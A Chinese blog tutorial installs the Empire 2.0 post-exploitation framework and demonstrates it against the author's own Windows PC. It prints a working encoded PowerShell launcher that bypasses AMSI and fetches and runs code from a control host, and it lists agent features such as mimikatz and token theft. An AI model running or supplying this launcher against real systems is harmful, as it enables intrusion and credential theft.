Empire2.0,powershell后渗透利器的安装和试用
休止千鹤 | 05/01/2021本文来自老博客,2017年5月. 现情况可能有变化.当时系统内置python版本默认是python2.7,整理时候对原文做出了一定语言表述上的修改.
当时正好在MS17010后不久,Empire配合MS17010的exp让我在当时打透了不少内网(scriptkid).然而这篇文章仅仅做了介绍试用而已.
注意: 物是人非,刚刚看了评论,去Empire项目看了看发现已经停止更新.
杂七杂八的前言
也就是前几天的事情吧,弄完了一堆又一堆的东西(比如rpi装msf配置数据库啊,nfc弄饭卡什么的)。偶然发现了一个神器:Empire
这家伙完全利用powershell做很多事情,避开检测,可以监听键盘,Mimikatz也在其中。是一个很牛逼的框架。
(本文为安装试用,以介绍为主,老司机可以关掉节省宝贵的时间学习别的东西)
那么我们今天就装一下并且看看是如何进行攻击的。
引用一段官网介绍:
Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.
↑官网链接过来的图,帅帅的是不是?
这肯定又是在树莓派上装了。毕竟只有这个算是一个好的节能服务器了。对,还是osmc。现在已经成为一个渗透工具了。(题外话:最近淘了一个orange pi, 打算做一个移动的渗透工具。做好了说不定也写一篇)
安装&解决问题
(如果你已经装上了就跳过这一段)
官网直接转去github
git clone https://github.com/EmpireProject/Empire.git
cd Empire/
cd setup/
//./install.sh
[!]This script must be run as root
//233
sudo ./install.sh
回到上一个目录 ./empire运行出了岔子,缺少OpenSSL,pip install 然后pip报错(莫名其妙)
Traceback (most recent call last):
File "/usr/bin/pip", line 9, in <module>
load_entry_point('pip==1.5.6', 'console_scripts', 'pip')()
File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 356, in load_entry_point
return get_distribution(dist).load_entry_point(group, name)
File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 2476, in load_entry_point
return ep.load()
File "/usr/lib/python2.7/dist-packages/pkg_resources.py", line 2190, in load
['__name__'])
File "/usr/lib/python2.7/dist-packages/pip/__init__.py", line 74, in <module>
from pip.vcs import git, mercurial, subversion, bazaar # noqa
File "/usr/lib/python2.7/dist-packages/pip/vcs/mercurial.py", line 9, in <module>
from pip.download import path_to_url
File "/usr/lib/python2.7/dist-packages/pip/download.py", line 25, in <module>
from requests.compat import IncompleteRead
ImportError: cannot import name IncompleteRead
(这里在2021年重新整理一下,当年废话太多了)
重新装了pip解决.
顺便安装依赖
sudo apt-get remove python-pip
sudo apt-get autoremove
sudo easy_install pip
sudo pip install pyopenssl netifaces zlib-wrapper
然后这才打开了Empire。确切的说是Empire2.0
================================================================
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.0 | [Web] https://theempire.io
================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
267 modules currently loaded
0 listeners currently active
0 agents currently active
(Empire) >
简单的使用演示
由于是2.0,操作和之前版本还是有去别的。摸索了半天。
这里的listeners就是MSF的监听。一样的。Agents相当于MSF的会话sessions。理清这个基本概念就好做事了。
我们的目标是让Rpi打开监听,协议http。然后生成一个dll载荷,生成一个powershell命令。诱骗目标执行(也可以用Badusb总之就是要执行一个命令)。
建立listener
(Empire) > listeners
[!] No listeners currently active
(Empire: listeners) > help
Listener Commands
=================
agents Jump to the Agents menu.
back Go back to the main menu.
exit Exit Empire.
help Displays the help menu.
info Display information for the given active listener.
kill Kill one or all active listeners.
launcher Generate an initial launcher for a listener.
list List all active listeners (or agents).
main Go back to the main menu.
uselistener Use an Empire listener module.
usestager Use an Empire stager.
(Empire: listeners) > uselistener
dbx http http_com http_foreign http_hop meterpreter
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
Name: HTTP[S]
Category: client_server
Authors:
@harmj0y
Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.
HTTP[S] Options:
Name Required Value Description
---- -------- ------- -----------
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -w 1 -enc Launcher string.
DefaultLostLimit True 60 Number of missed checkins before exiting
StagingKey True NLgp2rGjSu}k%RlUc*{zF:aKDCn[qev~ Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent.
process.php|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
WorkingHours False Hours for the agent to operate (09:00-17:00).
Host True http://192.168.0.101:89 Hostname/IP for staging.
CertPath False Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
Port True 89 Port for the listener.
(Empire: listeners/http) > set Name HttpListener
(Empire: listeners/http) > execute
[*] Starting listener 'HttpListener'
[+] Listener successfully started!
(Empire: listeners/http) >;
生成载荷
一个main命令回来
(整理注:整理的命令含义)
userstager windows/ 下面是windows可用的载荷
我这里用了dll
用info命令查看载荷具体信息set Listener HttpListener 用于设置回连的监听
set Arch x86 架构,我电脑比较破,32位选x86
execute 执行
================================================================
[Empire] Post-Exploitation Framework
================================================================
[Version] 2.0 | [Web] https://theempire.io
================================================================
_______ .___ ___. .______ __ .______ _______
| ____|| \/ | | _ \ | | | _ \ | ____|
| |__ | \ / | | |_) | | | | |_) | | |__
| __| | |\/| | | ___/ | | | / | __|
| |____ | | | | | | | | | |\ \----.| |____
|_______||__| |__| | _| |__| | _| `._____||_______|
267 modules currently loaded
1 listeners currently active
0 agents currently active
(Empire) > usestager windows/
bunny dll ducky hta launcher_bat launcher_sct launcher_vbs macro teensy
(Empire) > usestager windows/dll
(Empire: stager/windows/dll) > info
Name: DLL Launcher
Description:
Generate a PowerPick Reflective DLL to inject with
stager code.
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True http Listener to use.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
Language True powershell Language of the stager to generate.
OutFile True /tmp/launcher.dll File to output dll to.
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Arch True x86 Architecture of the .dll to generate
(x64 or x86).
StagerRetries False 0 Times for the stager to retry
connecting.
(Empire: stager/windows/dll) > set Listener HttpListener
(Empire: stager/windows/dll) > set Arch x86
(Empire: stager/windows/dll) > execute
[*] Stager output written out to: /tmp/launcher.dll
(Empire: stager/windows/dll) > listeners
[*] Active listeners:
Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
HttpListener http http://192.168.0.101:89 5/0.0
(Empire: listeners) > launcher powershell HttpListener
powershell -noP -w 1 -enc WwBSAEUAZgBdAC4AQQBTAFMAZQBtAGIAbABZAC4ARwBlAFQAVABZAHAAZQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAVABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMAZQB0AFYAQQBsAHUAZQAoACQAbgB1AEwAbAAsACQAVABSAFUAZQApAH0AOwBbAFMAWQBzAFQAZQBtAC4ATgBFAFQALgBTAEUAUgB2AEkAYwBFAFAAbwBpAG4AdABNAEEATgBhAEcAZQByAF0AOgA6AEUAWABwAGUAQwB0ADEAMAAwAEMAbwBuAHQAaQBuAFUARQA9ADAAOwAkAHcAQwA9AE4ARQBXAC0ATwBiAGoARQBjAFQAIABTAFkAUwB0AEUATQAuAE4AZQBUAC4AVwBlAGIAQwBsAGkARQBOAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AGMALgBIAEUAQQBkAEUAUgBzAC4AQQBEAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJAB3AGMALgBQAHIATwBYAFkAPQBbAFMAWQBzAFQAZQBNAC4ATgBFAFQALgBXAEUAYgBSAEUAUQB1AEUAcwBUAF0AOgA6AEQARQBmAGEAdQBsAFQAVwBFAEIAUAByAE8AWAB5ADsAJABXAEMALgBQAHIATwBYAHkALgBDAFIAZQBEAGUATgBUAEkAQQBsAHMAIAA9ACAAWwBTAHkAUwBUAEUAbQAuAE4ARQB0AC4AQwBSAEUARABFAG4AVABJAGEAbABDAEEAQwBoAGUAXQA6ADoARABlAEYAQQB1AGwAdABOAEUAdAB3AG8AcgBLAEMAcgBlAGQARQBuAFQASQBhAEwAUwA7ACQASwA9AFsAUwB5AFMAVABFAG0ALgBUAGUAWAB0AC4ARQBuAGMAbwBkAEkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAWQB0AGUAcwAoACcATgBMAGcAcAAyAHIARwBqAFMAdQB9AGsAJQBSAGwAVQBjACoAewB6AEYAOgBhAEsARABDAG4AWwBxAGUAdgB+ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIARwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAFUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABPAHIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBDAC4ASABFAGEARABlAHIAUwAuAEEAZABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AMQBPADAAZQBSAHUAYwBrAHAAdQBJAHgAYgBiAFYAVQA4AGwAegBOAHUAawA1AEUAVwA1ADgAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAwAC4AMQAwADEAOgA4ADkAJwA7ACQAdAA9ACcALwBuAGUAdwBzAC4AcABoAHAAJwA7ACQARABhAFQAQQA9ACQAVwBDAC4ARABPAHcAbgBMAG8AYQBkAEQAQQBUAGEAKAAkAHMAZQBSACsAJABUACkAOwAkAEkAdgA9ACQAZABhAHQAQQBbADAALgAuADMAXQA7ACQARABhAFQAQQA9ACQARABBAHQAYQBbADQALgAuACQARABBAFQAYQAuAGwAZQBOAGcAVABIAF0AOwAtAEoATwBpAG4AWwBDAGgAQQByAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA
(Empire: listeners) > [+] Initial agent 1R8T9BNA from 192.168.0.100 now active
(Empire: listeners) > agents
[*] Active agents:
Name Lang Internal IP Machine Name Username Process Delay Last Seen
--------- ---- ----------- ------------ --------- ------- ----- --------------------
1R8T9BNA ps 192.168.1.133 DESKTOP-NO77T28 DESKTOP-NO77T28\restpowershell/4060 5/0.0 2017-05-21 20:14:12
(Empire: agents) >
然后我们把刚刚生成的这么一大坨丢进一个cmd运行。(我的火绒弹出一个拦截,说powershell要联网)就返回一个agent。而那个cmd一闪而过。
就相当于得到一个MSF那样的会话了
目标简单探索
还是存在一些问题,就简单的贴两个info给各位看看了。
执行命令等待时间很长不知道为什么。尤其是列出文件目录,几乎没有反应。提权没有成功。
(Empire: listeners) > agents
[*] Active agents:
Name Lang Internal IP Machine Name Username Process Delay Last Seen
--------- ---- ----------- ------------ --------- ------- ----- --------------------
1R8T9BNA ps 192.168.1.133 DESKTOP-NO77T28 DESKTOP-NO77T28\restpowershell/4060 5/0.0 2017-05-21 20:14:12
(Empire: agents) > help
Commands
========
back Go back to the main menu.
clear Clear one or more agent's taskings.
creds Display/return credentials from the database.
exit Exit Empire.
help Displays the help menu.
interact Interact with a particular agent.
kill Task one or more agents to exit.
killdate Set the killdate for one or more agents (killdate [agent/all] 01/01/2016).
list Lists all active agents (or listeners).
listeners Jump to the listeners menu.
lostlimit Task one or more agents to 'lostlimit [agent/all] [number of missed callbacks] '
main Go back to the main menu.
remove Remove one or more agents from the database.
rename Rename a particular agent.
searchmodule Search Empire module names/descriptions.
sleep Task one or more agents to 'sleep [agent/all] interval [jitter]'
usemodule Use an Empire PowerShell module.
usestager Use an Empire stager.
workinghours Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00).
(Empire: agents) > interact 1R8T9BNA
(Empire: 1R8T9BNA) > help
Agent Commands
==============
agents Jump to the Agents menu.
back Go back a menu.
bypassuac Runs BypassUAC, spawning a new high-integrity agent for a listener. Ex. spawn <listener>
clear Clear out agent tasking.
creds Display/return credentials from the database.
download Task an agent to download a file.
exit Task agent to exit.
help Displays the help menu or syntax for particular commands.
info Display information about this agent
injectshellcode Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>
jobs Return jobs or kill a running job.
kill Task an agent to kill a particular process name or ID.
killdate Get or set an agent's killdate (01/01/2016).
list Lists all active agents (or listeners).
listeners Jump to the listeners menu.
lostlimit Task an agent to change the limit on lost agent detection
main Go back to the main menu.
mimikatz Runs Invoke-Mimikatz on the client.
psinject Inject a launcher into a remote process. Ex. psinject <listener> <pid/process_name>
pth Executes PTH for a CredID through Mimikatz.
rename Rename the agent.
revtoself Uses credentials/tokens to revert token privileges.
sc Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]
scriptcmd Execute a function in the currently imported PowerShell script.
scriptimport Imports a PowerShell script and keeps it in memory in the agent.
searchmodule Search Empire module names/descriptions.
shell Task an agent to use a shell command.
sleep Task an agent to 'sleep interval [jitter]'
spawn Spawns a new Empire agent for the given listener name. Ex. spawn <listener>
steal_token Uses credentials/tokens to impersonate a token for a given process ID.
sysinfo Task an agent to get system information.
updateprofile Update an agent connection profile.
upload Task an agent to upload a file.
usemodule Use an Empire PowerShell module.
workinghours Get or set an agent's working hours (9:00-17:00).
(Empire: 1R8T9BNA) > sysinfo
(Empire: 1R8T9BNA) > sysinfo: 0|http://192.168.0.101:89|DESKTOP-NO77T28|rest|DESKTOP-NO77T28|192.168.1.133|Microsoft Windows 10 教育版|False|powershell|4060|powershell|5
(Empire: 1R8T9BNA) > info
[*] Agent info:
nonce 7085646166885544
jitter 0.0
servers None
internal_ip 192.168.1.133
working_hours
session_key bYy3w$)K`>-.Jj;&@vEDSaMP|meFZT(!
children None
checkin_time 2017-05-21 20:14:06
hostname DESKTOP-NO77T28
id 1
delay 5
username DESKTOP-NO77T28\rest
kill_date
parent None
process_name powershell
listener HttpListener
process_id 4060
profile /admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT
6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
os_details Microsoft Windows 10 ???
lost_limit 60
taskings
name 1R8T9BNA
language powershell
external_ip 192.168.0.100
session_id 1R8T9BNA
lastseen_time 2017-05-21 20:18:37
language_version 5
high_integrity 0
(Empire: 1R8T9BNA) >
Views:
Comments
lee:
文章是最新写的,请问为什么不装最新版本呢,最新的empire 2.5
Replyrestkhz:(admin)
这篇文章是我2017年的时候写的. 因为去年博客搬了一下换了系统,所以很多文章链接失效了.这篇文章有人外链,那么还是补一下吧. 如果各位真的需要,欢迎留言什么的...我考虑补一篇最新版.另外,,, 各位都不留邮箱的吗!!! Replysec:
我下载有问题,师傅能发一个empire到邮箱吗,万分感谢
Replyrestkhz:(admin)
Hia? 是什么问题呢...? 如果你确定不是环境的问题, 可以到它releases去看看, 新版不行那么旧的版本也可以试试的哦OuO https://github.com/EmpireProject/Empire/releases Reply